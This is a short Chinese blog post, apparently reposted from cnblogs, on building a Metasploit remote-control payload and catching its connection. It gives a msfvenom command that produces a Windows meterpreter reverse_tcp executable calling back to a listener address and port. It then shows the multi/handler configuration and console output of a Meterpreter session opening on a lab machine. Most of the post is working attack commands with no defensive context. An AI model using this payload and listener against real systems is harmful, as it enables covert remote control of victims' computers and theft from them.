码迷,mamicode.com
首页 > 其他好文 > 详细

MSF生成被控端并上线

时间:2020-02-23 14:34:30      阅读:295      评论:0      收藏:0      [点我收藏+]

标签:rev   script   ecif   may   des   xpl   RoCE   and   list   

被控端生成:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe

技术图片

msf配置如下当被控端运行后即可上线:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: ‘‘, seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 192.168.5.139
LHOST => 192.168.5.139
msf5 exploit(multi/handler) > set LPORT 2345
LPORT => 2345
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.5.139:2345
[*] Sending stage (180291 bytes) to 192.168.5.170
[*] Meterpreter session 1 opened (192.168.5.139:2345 -> 192.168.5.170:49498) at 2020-02-23 13:01:36 +0800

meterpreter >
技术图片

技术图片

 

MSF生成被控端并上线

标签:rev   script   ecif   may   des   xpl   RoCE   and   list   

原文地址:https://www.cnblogs.com/Yang34/p/12349475.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!